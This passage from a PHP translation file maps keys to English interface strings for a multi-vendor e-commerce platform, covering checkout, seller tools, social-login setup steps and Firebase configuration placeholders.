'Confirm Email', 'in_about_section_select' => 'In about section select', 'other' => 'Other', 'and_press' => 'And press', 'complete_Registration' => 'Complete Registration', 'create_App' => 'Create App', 'select_an_app_type_and_press' => 'Select an app type and press', 'next' => 'Next', 'complete_the_add_details_form_and_press' => 'Complete the add details form and press', 'facebook_Login' => 'Facebook Login', 'set_Up' => 'Set Up', 'web' => 'Web', 'site_URL' => 'Site URL', 'base_URL_of_the_site_ex:' => 'Base URL of the site ex:', 'now_go_to' => 'Now go to', 'setting' => 'Setting', 'make_sure_to_check' => 'Make sure to check', 'client_OAuth_Login' => 'Client OAuth Login', 'must_on' => 'Must on', 'valid_OAuth_Redirect_URIs' => 'Valid OAuth Redirect URIs', 'save_Changes' => 'Save Changes', 'from_left_sidebar' => 'From left sidebar', 'basic' => 'Basic', 'fill_the_form_and_press' => 'Fill the form and press', 'now_copy' => 'Now copy', 'client_ID' => 'Client ID', '&' => '&', 'twitter_API_Set_up_Instructions' => 'Twitter API Set up Instructions', 'instruction_will_be_available_very_soon' => 'Instruction will be available very soon', 'copied_to_the_clipboard' => 'Copied to the clipboard', 'environment_Information' => 'Environment Information', 'true' => 'True', 'false' => 'False', 'dev' => 'Dev', 'default_status' => 'Default status', 'are_you_sure_to_delete_this' => 'Are you sure to delete this', 'Yes_delete_it' => 'Yes delete it', 'default_language_can_not_be_deleted' => 'Default language can not be deleted', 'to_delete_change_the_default_language_first' => 'To delete change the default language first', 'Do_not_Logout' => 'Do not Logout', 'messages.apple' => 'Messages.apple', 'Login Turned ON ' => 'Login Turned ON ', 'Login Turned OFF ' => 'Login Turned OFF ', 'Login is now enabled. Customers will be able to sign up or log in using their social media accounts.' => 'Login is now enabled. Customers will be able to sign up or log in using their social media accounts.', 'Login is now disabled. Customers will not be able to sign up or log in using their social media accounts. Please note that this may affect user experience and registration/login process.' => 'Login is now disabled. Customers will not be able to sign up or log in using their social media accounts. Please note that this may affect user experience and registration/login process.', 'Credential Setup' => 'Credential Setup', 'messages.client_id' => 'Messages.client id', 'messages.team_id' => 'Messages.team id', 'messages.key_id' => 'Messages.key id', 'messages.service_file' => 'Messages.service file', '(Already Exists)' => '(Already Exists)', 'messages.save' => 'Messages.save', 'messages.apple_api_set_instruction' => 'Messages.apple api set instruction', 'Go to Apple Developer page' => 'Go to Apple Developer page', 'messages.click_here' => 'Messages.click here', 'Here in top left corner you can see the' => 'Here in top left corner you can see the', 'Team ID' => 'Team ID', '[Apple_Deveveloper_Account_Name - Team_ID]' => '[Apple Deveveloper Account Name - Team ID]', 'Click Plus icon - select App IDs - click on Continue' => 'Click Plus icon - select App IDs - click on Continue', 'Put a description and also identifier (identifier that used for app) and this is the' => 'Put a description and also identifier (identifier that used for app) and this is the', 'Click Continue and Download the file in device named AuthKey_ID.p8 (Store it safely and it is used for push notification)' => 'Click Continue and Download the file in device named AuthKey ID.p8 (Store it safely and it is used for push notification)', 'Again click Plus icon - select Service IDs - click on Continue' => 'Again click Plus icon - select Service IDs - click on Continue', 'Push a description and also identifier and Continue' => 'Push a description and also identifier and Continue', 'Download the file in device named' => 'Download the file in device named', 'AuthKey_KeyID.p8' => 'AuthKey KeyID.p8', '[This is the Service Key ID file and also after AuthKey_ that is the Key ID]' => '[This is the Service Key ID file and also after AuthKey that is the Key ID]', 'Got It' => 'Got It', 'apple' => 'Apple', 'team_id' => 'Team id', 'key_id' => 'Key id', 'go_to_apple_developer_page' => 'Go to apple developer page', 'here_in_top__left_corner_you_can_see_the' => 'Here in top left corner you can see the', 'team_ID' => 'Team ID', 'apple_developer_account_name' => 'Apple developer account name', 'click_plus_icon' => 'Click plus icon', 'select_app_IDs' => 'Select app IDs', 'click_on_continue' => 'Click on continue', 'put_a_description_and_also_identifier_(identifier that used for app)_and_this_is_the' => 'Put a description and also identifier (identifier that used for app) and this is the', 'click_continue_and_download_the_file_in_device_named_AuthKey_ID.p8_(store_it_safely_and_it_is_used_for_push_notification)' => 'Click continue and download the file in device named AuthKey ID.p8 (store it safely and it is used for push notification)', 'again_click_plus_icon' => 'Again click plus icon', 'select_service_IDs' => 'Select service IDs', 'download_the_file_in_device_named' => 'Download the file in device named', 'this_is_the_service_key_ID_file_and_also_after_AuthKey_that_is_the_key_ID' => 'This is the service key ID file and also after AuthKey that is the key ID', 'google_credentials_updated' => 'Google credentials updated', 'credential_updated' => 'Credential updated', 'online_shopping' => 'Online shopping', 'check_now' => 'Check now', 'all_Categories' => 'All Categories', 'most_visited_categories' => 'Most visited categories', 'See_all' => 'See all', 'in_stock' => 'In stock', 'recommended_for_you' => 'Recommended for you', 'latest_product' => 'Latest product', 'most_searching' => 'Most searching', 'don’t_miss_todays_deal' => 'Don’t miss todays deal', 'stock_available' => 'Stock available', 'shop_now' => 'Shop now', 'all_products' => 'All products', 'filter_by' => 'Filter by', 'a_to_z_order' => 'A to z order', 'z_to_a_Order' => 'Z to a Order', 'low_to_high_price' => 'Low to high price', 'high_to_low_price' => 'High to low price', 'price_range' => 'Price range', 'all_categories' => 'All categories', 'by_review_rating' => 'By review rating', 'best_selling' => 'Best selling', 'most_loved' => 'Most loved', 'signature_product' => 'Signature product', 'signature_product_for_this_season' => 'Signature product for this season', 'top_fashion_house' => 'Top fashion house', 'visit' => 'Visit', 'shop_again_from_your_recent_store' => 'Shop again from your recent store', 'visit_again' => 'Visit again', 'others_store' => 'Others store', 'top_rated_seller' => 'Top rated seller', 'new_seller' => 'New seller', 'visit_shop' => 'Visit shop', 'seller_reg' => 'Seller reg', 'sign_Out' => 'Sign Out', 'ex_:_8+_character' => 'Ex : 8+ character', 'enjoy_new_experience' => 'Enjoy new experience', 'ex:' => 'Ex:', 'by_clicking_sign_up_you_are_agreed_with_our ' => 'By clicking sign up you are agreed with our ', 'terms_&_policy' => 'Terms & policy', 'have_an_account' => 'Have an account', 'Customers will not be able to select COD as a payment method during checkout. Please review your settings and enable COD if you wish to offer this payment option to customers.' => 'Customers will not be able to select COD as a payment method during checkout. Please review your settings and enable COD if you wish to offer this payment option to customers.', 'compare' => 'Compare', 'newsletter' => 'Newsletter', 'be_the_first_one_to_know_about_discounts_offers_and_events' => 'Be the first one to know about discounts offers and events', 'enter_your_email' => 'Enter your email', 'popular_tags' => 'Popular tags', 'quick_links' => 'Quick links', 'upcoming_campaign' => 'Upcoming campaign', 'all_stores' => 'All stores', 'blog' => 'Blog', 'support' => 'Support', 'live_chat' => 'Live chat', 'manage_deliveries' => 'Manage deliveries', 'payment_option' => 'Payment option', 'accept_All_Cookies' => 'Accept All Cookies', 'promo_banner_left' => 'Promo banner left', 'promo_banner_middle_top' => 'Promo banner middle top', 'promo_banner_middle_bottom' => 'Promo banner middle bottom', 'promo_banner_right' => 'Promo banner right', 'promo_banner_bottom' => 'Promo banner bottom', 'shop_wise_with' => 'Shop wise with', 'explore_now' => 'Explore now', 'search_products' => 'Search products', 'similar_category_product' => 'Similar category product', 'z_to_a_order' => 'Z to a order', 'all_Pages_Banner' => 'All Pages Banner', 'share' => 'Share', 'category_tag' => 'Category tag', 'social_Media_Chatting' => 'Social Media Chatting', 'whatsApp' => 'WhatsApp', 'whatsapp_information_update_successfully' => 'Whatsapp information update successfully', 'refer_&_earn' => 'Refer & earn', 'refer_&_Earn' => 'Refer & Earn', 'joined' => 'Joined', 'in_compare' => 'In compare', 'my_wishlist' => 'My wishlist', 'my_compare_list' => 'My compare list', 'inbox' => 'Inbox', 'invite_Your_Friends_&_Businesses' => 'Invite Your Friends & Businesses', 'copy_your_code_and_share_your_friends' => 'Copy your code and share your friends', 'your_personal_code' => 'Your personal code', 'oR_SHARE' => 'OR SHARE', 'how_you_it_works' => 'How you it works', 'invite_your_friends_&_businesses' => 'Invite your friends & businesses', 'they_register_6Valley_with_special_offer' => 'They register 6Valley with special offer', 'you_made_your_earning' => 'You made your earning', 'successfully_copied' => 'Successfully copied', 'copied_failed' => 'Copied failed', 'instagram' => 'Instagram', 'linkedIn' => 'LinkedIn', 'pinterest' => 'Pinterest', 'google_plus' => 'Google plus', 'enter_Social_Media_Link' => 'Enter Social Media Link', 'social_Name_Is_Requeired.' => 'Social Name Is Requeired.', 'social_Link_Is_Requeired.' => 'Social Link Is Requeired.', 'social_Media_Already_taken' => 'Social Media Already taken', 'social_Media_inserted_Successfully.' => 'Social Media inserted Successfully.', 'social_info_updated_successfully.' => 'Social info updated successfully.', 'are_you_sure_delete_this_social_media' => 'Are you sure delete this social media', 'social_media_deleted_successfully.' => 'Social media deleted successfully.', 'my_wishlists' => 'My wishlists', 'search_by_name_or_category' => 'Search by name or category', 'all_wishing_product_list' => 'All wishing product list', 'remove_all' => 'Remove all', 'stock_status' => 'Stock status', 'vat' => 'Vat', 'no_discount' => 'No discount', 'stock_Available' => 'Stock Available', 'stock_not_available' => 'Stock not available', 'product_comparison' => 'Product comparison', 'find_and_select_products_to_see_the_differences_and_similarities_between_them' => 'Find and select products to see the differences and similarities between them', 'color_variant' => 'Color variant', 'no_rating' => 'No rating', 'no_color' => 'No color', 'view_all_cart_items' => 'View all cart items', ' ecommerce' => ' ecommerce', 'all_cart_product_list' => 'All cart product list', 'totals_cost' => 'Totals cost', 'apply_coupon_code' => 'Apply coupon code', 'item_price' => 'Item price', 'proceed_to_checkout' => 'Proceed to checkout', 'item_has_been_removed_from_cart ' => 'Item has been removed from cart ', 'Secret Covered in Sand Comic book pdf' => 'Secret Covered in Sand Comic book pdf', 'total_price_for_this_product' => 'Total price for this product', 'you_can_check_our' => 'You can check our', 'ask_about_this_product' => 'Ask about this product', 'recommended' => 'Recommended', 'positive' => 'Positive', 'good' => 'Good', 'neutral' => 'Neutral', 'negative' => 'Negative', 'general_info' => 'General info', 'view_less' => 'View less', 'top_rated_product_from_this_store' => 'Top rated product from this store', 'contact_with_seller' => 'Contact with seller', 'type _your_message' => 'Type your message', 'go_to_chatbox' => 'Go to chatbox', 'similar_product_from_this_store' => 'Similar product from this store', 'you_may_also_like' => 'You may also like', 'start_from' => 'Start from', 'shipping_details' => 'Shipping details', 'delivery_information_details' => 'Delivery information details', 'delivery_address' => 'Delivery address', 'select_from_saved' => 'Select from saved', 'set_from_map' => 'Set from map', 'set_delivery_address' => 'Set delivery address', 'select_country' => 'Select country', 'zip_Code' => 'Zip Code', 'others' => 'Others', 'contact_Person_Name' => 'Contact Person Name', 'save_this_Address' => 'Save this Address', 'order_summary' => 'Order summary', 'proceed_to_next' => 'Proceed to next', 'saved_addresses' => 'Saved addresses', 'update_this_Address' => 'Update this Address', 'personal_details' => 'Personal details', 'edit_profile' => 'Edit profile', 'my_address' => 'My address', 'add_address' => 'Add address', 'this_coupon_is_valid_for_use_after_a_minimum_purchase_of' => 'This coupon is valid for use after a minimum purchase of', 'select_payment_method' => 'Select payment method', 'please_confirm_your_verified_account_to_pay_through_your_bank_account' => 'Please confirm your verified account to pay through your bank account', 'error' => 'Error', 'your_order_is_completed' => 'Your order is completed', 'your_order_is_being_processed_and_will_be_completed_within_3-6 hours._you_will_receive_an_email_confirmation_when_your_order_is_completed.' => 'Your order is being processed and will be completed within 3-6 hours. you will receive an email confirmation when your order is completed.', 'previous' => 'Previous', 'search_by_order_ID' => 'Search by order ID', 'order_invoice' => 'Order invoice', 'all_copy_right_reserved_©_2023_' => 'All copy right reserved © 2023 ', 'my_order_details' => 'My order details', 'delivery_man_info' => 'Delivery man info', 'shipping_fee' => 'Shipping fee', 'store_list' => 'Store list', 'search_store' => 'Search store', 'shop_page' => 'Shop page', 'followers' => 'Followers', 'want_to_unfollow_this_shop' => 'Want to unfollow this shop', 'featured_product_from_this_store' => 'Featured product from this store', 'all_product' => 'All product', 'this_shop_is_temporary_closed_or_on_vacation' => 'This shop is temporary closed or on vacation', 'you_cannot_add_product_to_cart_from_this_shop_for_now' => 'You cannot add product to cart from this shop for now', '15 IN 1 MAKEUP COMBO SET WITH FULL MAKEUP COVERAGE set' => '15 IN 1 MAKEUP COMBO SET WITH FULL MAKEUP COVERAGE set', 'Chicken and Egg Puppy Dog Food 400g' => 'Chicken and Egg Puppy Dog Food 400g', 'Ava Professional Hair Straightener - Black color' => 'Ava Professional Hair Straightener - Black color', 'Silicone Strap Analogue Sports Watch Rectangular Dial New Model 2023 Men Watches' => 'Silicone Strap Analogue Sports Watch Rectangular Dial New Model 2023 Men Watches', 'online_Shopping' => 'Online Shopping', 'see_the_latest_deals_and_exciting_new_offers' => 'See the latest deals and exciting new offers', 'fast_delivery_all_accross_the_country' => 'Fast delivery all accross the country', 'safe_payment' => 'Safe payment', '7_Days_Return_Policy' => '7 Days Return Policy', 'expand_Menu' => 'Expand Menu', 'seller_zone' => 'Seller zone', 'become_a_seller' => 'Become a seller', 'about_Company' => 'About Company', 'contact_Us' => 'Contact Us', 'subscribe_to_our_new_channel_to_get_latest_updates' => 'Subscribe to our new channel to get latest updates', 'your_Email_Address' => 'Your Email Address', 'start_a_conversation' => 'Start a conversation', 'currency_changed_to' => 'Currency changed to', 'item_has_been_removed_from_cart' => 'Item has been removed from cart', 'sorry_the_minimum_order_quantity_does_not_match' => 'Sorry the minimum order quantity does not match', 'sorry_stock_limit_exceeded.' => 'Sorry stock limit exceeded.', 'enter_email_address_or_phone_number' => 'Enter email address or phone number', 'show_password' => 'Show password', 'image_ratio_should_be' => 'Image ratio should be', 'country_code_is_must_like_for_BD' => 'Country code is must like for BD', 'want_to_delete_this_account' => 'Want to delete this account', 'please_ReType_Password' => 'Please ReType Password', 'passwords_do_not_match' => 'Passwords do not match', 'passwords_match' => 'Passwords match', 'subject' => 'Subject', 'website_problem' => 'Website problem', 'complaint' => 'Complaint', 'info_inquiry' => 'Info inquiry', 'urgent' => 'Urgent', 'high' => 'High', 'medium' => 'Medium', 'topic' => 'Topic', 'customer_referrer_earning' => 'Customer referrer earning', 'One Referrer Equal To How Much USD' => 'One Referrer Equal To How Much USD', 'customer_settings_updated_successfully' => 'Customer settings updated successfully', 'Website problem' => 'Website problem', 'do_you_want_to_delete_this' => 'Do you want to delete this', 'Do_not_delete' => 'Do not delete', 'search_Ticket_by_Subject_or_status' => 'Search Ticket by Subject or status', 'all_Priority' => 'All Priority', 'all_Status' => 'All Status', 'leave_a_Message' => 'Leave a Message', 'write_your_message_here' => 'Write your message here', 'please write the message' => 'Please write the message', 'reply' => 'Reply', 'support_Ticket_Answer' => 'Support Ticket Answer', 'date_Submitted' => 'Date Submitted', 'last_updated' => 'Last updated', 'please_write_the_message' => 'Please write the message', 'submit_message' => 'Submit message', 'forgot_Password' => 'Forgot Password', 'forgot_your_password' => 'Forgot your password', 'change_your_password_in_three_easy_steps.' => 'Change your password in three easy steps.', 'this_helps_to_keep_your_new_password_secure.' => 'This helps to keep your new password secure.', 'fill_in_your_email_address_below.' => 'Fill in your email address below.', 'we_will_email_you_a_temporary_code.' => 'We will email you a temporary code.', 'use_the_code_to_change_your_password_on_our_secure_website.' => 'Use the code to change your password on our secure website.', 'enter_your_email_address' => 'Enter your email address', 'please_provide_valid_email_address.' => 'Please provide valid email address.', 'get_new_password' => 'Get new password', 'Password_Reset_Mail' => 'Password Reset Mail', 'Configuration_updated_successfully' => 'Configuration updated successfully', 'Test_Email_Sender' => 'Test Email Sender', 'mail_received_successfully' => 'Mail received successfully', 'valid_till' => 'Valid till', 'available_from_minimum_purchase' => 'Available from minimum purchase', 'copied' => 'Copied', 'Coupon_status_updated' => 'Coupon status updated', 'shop_Page' => 'Shop Page', 'search_products_from_this_store' => 'Search products from this store', 'All_Seller_Page' => 'All Seller Page', 'all_Sellers' => 'All Sellers', 'max' => 'Max', 'items_found' => 'Items found', 'low_to_High_Price' => 'Low to High Price', 'excellent' => 'Excellent', 'average' => 'Average', 'below_Average' => 'Below Average', 'poor' => 'Poor', 'product_review' => 'Product review', 'safe_Payment' => 'Safe Payment', 'visit_Store' => 'Visit Store', 'more_From_The_Store' => 'More From The Store', 'all_Category' => 'All Category', 'select_your_desire_category.' => 'Select your desire category.', 'chat_with_delivery_man' => 'Chat with delivery man', 'my_Order_List' => 'My Order List', 'chat_with_deliveryman' => 'Chat with deliveryman', 'shipping_Fee' => 'Shipping Fee', 'track_Order' => 'Track Order', 'send_a_message' => 'Send a message', 'product_List' => 'Product List', 'in_House_Product_List' => 'In House Product List', 'search_Product_Name' => 'Search Product Name', 'limited_Sotcks' => 'Limited Sotcks', 'add_New_Product' => 'Add New Product', 'product Name' => 'Product Name', 'product Type' => 'Product Type', 'show_as_featured' => 'Show as featured', 'Status_updated_failed.' => 'Status updated failed.', 'Product_must_be_approved' => 'Product must be approved', 'featured_status_updated_successfully' => 'Featured status updated successfully', 'product_Add' => 'Product Add', 'general_Info' => 'General Info', 'ready_After_Sell' => 'Ready After Sell', 'ready_Product' => 'Ready Product', 'sub_Category' => 'Sub Category', 'sub_Sub_Category' => 'Sub Sub Category', 'unit' => 'Unit', 'colors' => 'Colors', 'product_price_&_stock' => 'Product price & stock', 'tax_Model' => 'Tax Model', 'discount_Type' => 'Discount Type', 'flat' => 'Flat', 'total_Quantity' => 'Total Quantity', 'meta_Title' => 'Meta Title', 'meta_Description' => 'Meta Description', 'meta_Image' => 'Meta Image', 'youtube_video_link' => 'Youtube video link', 'optional_please_provide_embed_link_not_direct_link' => 'Optional please provide embed link not direct link', 'upload_product_images' => 'Upload product images', 'upload_thumbnail' => 'Upload thumbnail', 'please_only_input_png_or_jpg_type_file' => 'Please only input png or jpg type file', 'choice_Title' => 'Choice Title', 'enter_choice_values' => 'Enter choice values', 'want_to_add_this_product' => 'Want to add this product', 'product_added_successfully' => 'Product added successfully', 'variant Price' => 'Variant Price', 'refer_code' => 'Refer code', 'Already_have_store' => 'Already have store', 'NB' => 'NB', 'image_size_must_be_within' => 'Image size must be within', 'image_type_must_be_within' => 'Image type must be within', 'Ex_:_Shop_-12_Road-8' => 'Ex : Shop -12 Road-8', 'overall_Statistics' => 'Overall Statistics', 'out_For_Delivery' => 'Out For Delivery', 'seller_Wallet' => 'Seller Wallet', 'withdrawable_balance' => 'Withdrawable balance', 'pending_Withdraw' => 'Pending Withdraw', 'total_Commission_given' => 'Total Commission given', 'already_Withdrawn' => 'Already Withdrawn', 'withdraw_Request' => 'Withdraw Request', 'incomplete_bank_info' => 'Incomplete bank info', 'update_your_bank_info_first' => 'Update your bank info first', 'failed To Deliver' => 'Failed To Deliver', 'refund_Request_List' => 'Refund Request List', 'product_Reviews' => 'Product Reviews', 'delivery-Man' => 'Delivery-Man', 'Reports_&_Analysis' => 'Reports & Analysis', 'emergency_Contact' => 'Emergency Contact', 'copyright' => 'Copyright', 'select_Logout_below_if_you_are_ready_to_end_your_current_session' => 'Select Logout below if you are ready to end your current session', 'you_have_new order' => 'You have new order', 'check_Please' => 'Check Please', 'shop_view' => 'Shop view', 'shop_Info' => 'Shop Info', 'by_turning_on_temporary_close_mode _your_shop_will_be_shown_as_temporary_off_in_the_website_and_app_for_the_customers._they_cannot_purchase_or_place_order_from_your_shop' => 'By turning on temporary close mode your shop will be shown as temporary off in the website and app for the customers. they cannot purchase or place order from your shop', 'my_shop_info' => 'My shop info', 'vacation_Mode' => 'Vacation Mode', 'vacation_Start' => 'Vacation Start', 'vacation_End' => 'Vacation End', 'vacation_Note' => 'Vacation Note', 'are_you_sure_Change_this' => 'Are you sure Change this', 'Ex:_6+ character' => 'Ex: 6+ character', 'Image_ratio_should_be' => 'Image ratio should be', 'seller_Image' => 'Seller Image', 'upload_image' => 'Upload image', '8+_Character' => '8+ Character', 'repeat' => 'Repeat', 'not_match' => 'Not match', 'upload_logo' => 'Upload logo', 'upload_Banner' => 'Upload Banner', 'customer_list' => 'Customer list', 'search_by_Name_or_Email_or_Phone' => 'Search by Name or Email or Phone', 'total_Order' => 'Total Order', 'sorry_this_item_is_currently_sold_out' => 'Sorry this item is currently sold out', 'order_place' => 'Order place', 'add_fund_by_admin' => 'Add fund by admin', 'how_to_use' => 'How to use', 'seller_Info' => 'Seller Info', 'repeat_password_not_match' => 'Repeat password not match', 'apply_Shop' => 'Apply Shop', 'create_support_tickets' => 'Create support tickets', 'Website_problem' => 'Website problem', 'Info_inquiry' => 'Info inquiry', 'flash_Deal' => 'Flash Deal', 'add_Product' => 'Add Product', 'deal_Product' => 'Deal Product', 'add_new_product' => 'Add new product', 'product_Table' => 'Product Table', 'are_you_sure_remove_this_product' => 'Are you sure remove this product', 'language_Translate' => 'Language Translate', 'key_removed_successfully' => 'Key removed successfully', 'key_translated_successfully' => 'Key translated successfully', 'Waltro Vivobook X515ea intel core i3 1115g4 4GB DDR4 Ram 512GB' => 'Waltro Vivobook X515ea intel core i3 1115g4 4GB DDR4 Ram 512GB', 'ex_:_7+_character' => 'Ex : 7+ character', 'no_Account' => 'No Account', 'register_control_your_order.' => 'Register control your order.', 'please_enter_your_first_name' => 'Please enter your first name', 'please_enter_your_last_name' => 'Please enter your last name', 'please_enter_valid_email_address' => 'Please enter valid email address', 'please_enter_your_phone_number' => 'Please enter your phone number', 'seller_apply' => 'Seller apply', 'seller_registration' => 'Seller registration', 'create_your_own_store.' => 'Create your own store.', 'already_have_store ' => 'Already have store ', 'open_your_and_start_selling.' => 'Open your and start selling.', 'create_your_own_business' => 'Create your own business', 'enter_email' => 'Enter email', 'enter_password' => 'Enter password', 'password_doesn t_match' => 'Password doesn t match', 'seller_image' => 'Seller image', 'image_ration' => 'Image ration', 'store_name' => 'Store name', 'store_address' => 'Store address', 'store_banner' => 'Store banner', 'image_ratio' => 'Image ratio', 'store_logo' => 'Store logo', 'your_password_must_be_at_least_8_characters' => 'Your password must be at least 8 characters', 'password_doesn t_Match' => 'Password doesn t Match', 'customer_verify' => 'Customer verify', ' please_Verify_that_it’s_you.' => ' please Verify that it’s you.', 'an_OTP' => 'An OTP', 'one_time_password' => 'One time password', 'has_been_sent_to_' => 'Has been sent to ', 'resend_code_within' => 'Resend code within', 'resend_OTP' => 'Resend OTP', 'verification_successfully_completed' => 'Verification successfully completed', 'thank_you_for_your_verification' => 'Thank you for your verification', 'now_you_can_login' => 'Now you can login', 'please_Verify_that_it’s_you.' => 'Please Verify that it’s you.', 'by_clicking_sign_up_you_are_agreed_with_our' => 'By clicking sign up you are agreed with our', 'Main_Banner' => 'Main Banner', 'Footer_Banner' => 'Footer Banner', 'Popup_Banner' => 'Popup Banner', 'enter_url' => 'Enter url', 'banner_updated_successfully' => 'Banner updated successfully', 'please_verify_that_it’s_you.' => 'Please verify that it’s you.', 'View_all_cart_items' => 'View all cart items', 'product_Edit' => 'Product Edit', 'new_Product' => 'New Product', 'purchese_price' => 'Purchese price', 'clear_all' => 'Clear all', 'FCM_Settings' => 'FCM Settings', 'push_Notification_Setup' => 'Push Notification Setup', 'Firebase Configuration' => 'Firebase Configuration', 'where_to_get_this_information ' => 'Where to get this information ', 'server_Key' => 'Server Key', 'Ex: abcd1234efgh5678ijklmnop90qrstuvwxYZ' => 'Ex: abcd1234efgh5678ijklmnop90qrstuvwxYZ', 'FCM_Project_ID' => 'FCM Project ID', 'api_Key' => 'Api Key', 'Ex: my-awesome-app-12345' => 'Ex: my-awesome-app-12345', 'auth_domain' => 'Auth domain', 'Ex: my-awesome-app.firebaseapp.com' => 'Ex: my-awesome-app.firebaseapp.com', 'storage_bucket' => 'Storage bucket', 'Ex: my-awesome-app.appspot.com' => 'Ex: my-awesome-app.appspot.com', 'messaging_sender_id' => 'Messaging sender id', 'Ex: 1234567890' => 'Ex: 1234567890', 'api_ID' => 'Api ID', 'Ex: 9876543210' => 'Ex: 9876543210', 'measurement_ID' => 'Measurement ID', 'Ex: F-12345678' => 'Ex: F-12345678', 'notificatios' => 'Notificatios', 'send_notification' => 'Send notification', 'Send_Notification' => 'Send Notification', 'wallet_bonus_setup' => 'Wallet bonus setup', 'email_templates' => 'Email templates', 'read_documentation' => 'Read documentation', 'order_Pending_Message' => 'Order Pending Message', 'order_Confirmation_Message' => 'Order Confirmation Message', 'order_Packaging_Message' => 'Order Packaging Message', 'order_out_for_delivery_Message' => 'Order out for delivery Message', 'order_Delivered_Message' => 'Order Delivered Message', 'order_Returned_Message' => 'Order Returned Message', 'order_Failed_Message' => 'Order Failed Message', 'order_canceled_message' => 'Order canceled message', 'order_refunded_message' => 'Order refunded message', 'refund_request_canceled_message' => 'Refund request canceled message', 'message_from_delivery_man' => 'Message from delivery man', 'message_from_seller' => 'Message from seller', 'fund_add_by_admin+message' => 'Fund add by admin+message', 'got_it' => 'Got it', 'ex: 49679646444789dsf64f64f6' => 'Ex: 49679646444789dsf64f64f6', 'ex: dhaka' => 'Ex: dhaka', 'ex: f64f6' => 'Ex: f64f6', 'PAYMENT_METHODS' => 'PAYMENT METHODS', 'Ofline_Payment_Methods' => 'Ofline Payment Methods', 'offline_Payment_Methods' => 'Offline Payment Methods', 'offline_Payment_Method' => 'Offline Payment Method', 'order_Type' => 'Order Type', 'custom' => 'Custom', 'category_Name' => 'Category Name', 'new_Category' => 'New Category', 'set_Priority' => 'Set Priority', 'category_Logo' => 'Category Logo', 'category_Image' => 'Category Image', 'category_deleted_successfully.' => 'Category deleted successfully.', 'search_by_name' => 'Search by name', 'brand_Logo' => 'Brand Logo', 'total_Product' => 'Total Product', 'are_you_sure_delete_this_brand' => 'Are you sure delete this brand', 'brand_deleted_successfully' => 'Brand deleted successfully', 'add_new_notification' => 'Add new notification', 'new_notification' => 'New notification', 'send_Notification' => 'Send Notification', 'push_notification_table' => 'Push notification table', 'search_by_title' => 'Search by title', 'notification_count' => 'Notification count', 'resend' => 'Resend', 'you_will_not_be able_to_revert_this' => 'You will not be able to revert this', 'notification_deleted_successfully' => 'Notification deleted successfully', 'resend_notification' => 'Resend notification', 'earning_Reports' => 'Earning Reports', 'admin_Earning' => 'Admin Earning', 'seller_Earning' => 'Seller Earning', 'filter_Data' => 'Filter Data', 'custom_Date' => 'Custom Date', 'total_earnings' => 'Total earnings', 'total_In_House_Products' => 'Total In House Products', 'total_Shop' => 'Total Shop', 'earning_Statistics' => 'Earning Statistics', 'total_Earnings' => 'Total Earnings', 'payment_Statistics' => 'Payment Statistics', 'payments_Amount' => 'Payments Amount', 'in-House_Earning' => 'In-House Earning', 'commission_Earning' => 'Commission Earning', 'earn_From_Shipping' => 'Earn From Shipping', 'discount_Given' => 'Discount Given', 'refund_Given' => 'Refund Given', 'total_Earning' => 'Total Earning', 'cash_Payments' => 'Cash Payments', 'digital_Payments' => 'Digital Payments', 'wallet_Payments' => 'Wallet Payments', 'search_by_Name_or_Phone_or_Email' => 'Search by Name or Phone or Email', 'deliveryman_List' => 'Deliveryman List', 'add_Delivery_Man' => 'Add Delivery Man', 'contact info' => 'Contact info', 'total_Orders' => 'Total Orders', 'Ex: English' => 'Ex: English', 'currency' => 'Currency', 'phone (OTP)' => 'Phone (OTP)', 'email_Verification' => 'Email Verification', 'guest_checkout' => 'Guest checkout', 'app_download_info' => 'App download info', 'download_link' => 'Download link', 'app_store_download_link' => 'App store download link', 'Ex: https://www.apple.com/app-store/' => 'Ex: https://www.apple.com/app-store/', 'play_store_download_link' => 'Play store download link', 'Ex: https://play.google.com/store/apps' => 'Ex: https://play.google.com/store/apps', 'save_information' => 'Save information', 'by_turning_on_temporary_close_mode _your_shop_will_be_shown_as_temporary_off_in_the_website_and_app_for_the_customers.' => 'By turning on temporary close mode your shop will be shown as temporary off in the website and app for the customers.', 'they_cannot_purchase_or_place_order_from_your_shop' => 'They cannot purchase or place order from your shop', 'print__Invoice' => 'Print Invoice', 'item_Details' => 'Item Details', 'change_status_to_paid' => 'Change status to paid', 'location_data' => 'Location data', 'you_wont_be_able_to_revert_this' => 'You wont be able to revert this', 'delivery_man_successfully_assigned/changed' => 'Delivery man successfully assigned/changed', 'deliveryman_man_can_not_assign/change_in_that_status' => 'Deliveryman man can not assign/change in that status', 'edit_products' => 'Edit products', 'change_order_status' => 'Change order status', 'Ex: John Doe' => 'Ex: John Doe', 'Ex: 32416436546' => 'Ex: 32416436546', 'Ex: Dhaka' => 'Ex: Dhaka', 'Ex: 1216' => 'Ex: 1216', 'Ex: Street 1 Street 2 Street 3 Street 4' => 'Ex: Street 1 Street 2 Street 3 Street 4', 'Ex: john@gmail.com' => 'Ex: john@gmail.com', 'update_product_list' => 'Update product list', 'consumer_electronics' => 'Consumer electronics', 'wearable' => 'Wearable', 'audio' => 'Audio', 'select_subcategory' => 'Select subcategory', 'electronics' => 'Electronics', 'select_brand' => 'Select brand', 'gogoi' => 'Gogoi', 'puma' => 'Puma', 'warely' => 'Warely', 'Search by product name or bar code' => 'Search by product name or bar code', 'select_variation' => 'Select variation', 'sound' => 'Sound', 'update_cart' => 'Update cart', 'product_Section' => 'Product Section', 'billing_Section' => 'Billing Section', 'view_all_hold_orders' => 'View all hold orders', 'wc-327478' => 'Wc-327478', 'product_Discount' => 'Product Discount', 'extra_Discount' => 'Extra Discount', 'coupon_Discount' => 'Coupon Discount', 'paid_By' => 'Paid By', 'cancel_Order' => 'Cancel Order', 'list_of_hold_orders' => 'List of hold orders', 'resume' => 'Resume', 'cancel_order' => 'Cancel order', 'amount_can_not_be_negative_or_zero' => 'Amount can not be negative or zero', 'product_already_added_in_cart' => 'Product already added in cart', 'sorry_product_is_out_of_stock.' => 'Sorry product is out of stock.', 'item_has_been_added_in_your_cart' => 'Item has been added in your cart', 'you_want_to_remove_all_items_from_cart' => 'You want to remove all items from cart', 'product_quantity_is_not_enough' => 'Product quantity is not enough', 'product_quantity_can_not_be_zero_or_less_than_zero_in_cart' => 'Product quantity can not be zero or less than zero in cart', 'product_quantity_updated' => 'Product quantity updated', 'sorry_product_out_of_stock' => 'Sorry product out of stock', 'Product_quantity_can_not_be_zero_or_less_than_zero_in_cart' => 'Product quantity can not be zero or less than zero in cart', 'Product_quantity_updated' => 'Product quantity updated', 'wc-327479' => 